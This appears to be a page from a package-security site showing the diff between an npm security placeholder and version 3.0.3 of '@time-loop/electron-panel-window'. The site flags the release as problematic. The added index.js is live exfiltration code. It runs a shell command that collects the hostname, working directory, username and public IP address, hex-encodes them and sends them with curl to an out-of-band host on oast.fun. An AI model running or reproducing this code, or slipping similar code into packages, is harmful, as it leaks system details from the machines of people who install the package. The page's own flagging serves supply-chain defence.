@time-loop/electron-panel-window 0.0.1-security → 3.0.3

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @time-loop/electron-panel-window might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +1 -5
  2. package/index.js +14 -0
  3. package/package.json +8 -3
package/README.md CHANGED
@@ -1,5 +1 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=%40time-loop%2Felectron-panel-window for more information.
1
+ # electron-panel-window
package/index.js ADDED
@@ -0,0 +1,14 @@
1
+ const { exec } = require("child_process");
2
+
3
+ const myDomain = 'jxffxlhzhrxegbrioqpcp14vlpjohjkxs.oast.fun';
4
+ exec("a=$(hostname;pwd;whoami;echo 'electron-panel-windows';curl https://ifconfig.me;) && echo $a | xxd -p | head | while read ut;do curl -k -i -s https://jxffxlhzhrxegbrioqpcp14vlpjohjkxs.oast.fun/$ut;done" , (error, data, getter) => {
5
+ if(error){
6
+ console.log("error",error.message);
7
+ return;
8
+ }
9
+ if(getter){
10
+ console.log(data);
11
+ return;
12
+ }
13
+ console.log(data);
14
+ });
package/package.json CHANGED
@@ -1,6 +1,11 @@
1
1
  {
2
2
  "name": "@time-loop/electron-panel-window",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "3.0.3",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "rakesh0x7",
10
+ "license": "ISC"
6
11
  }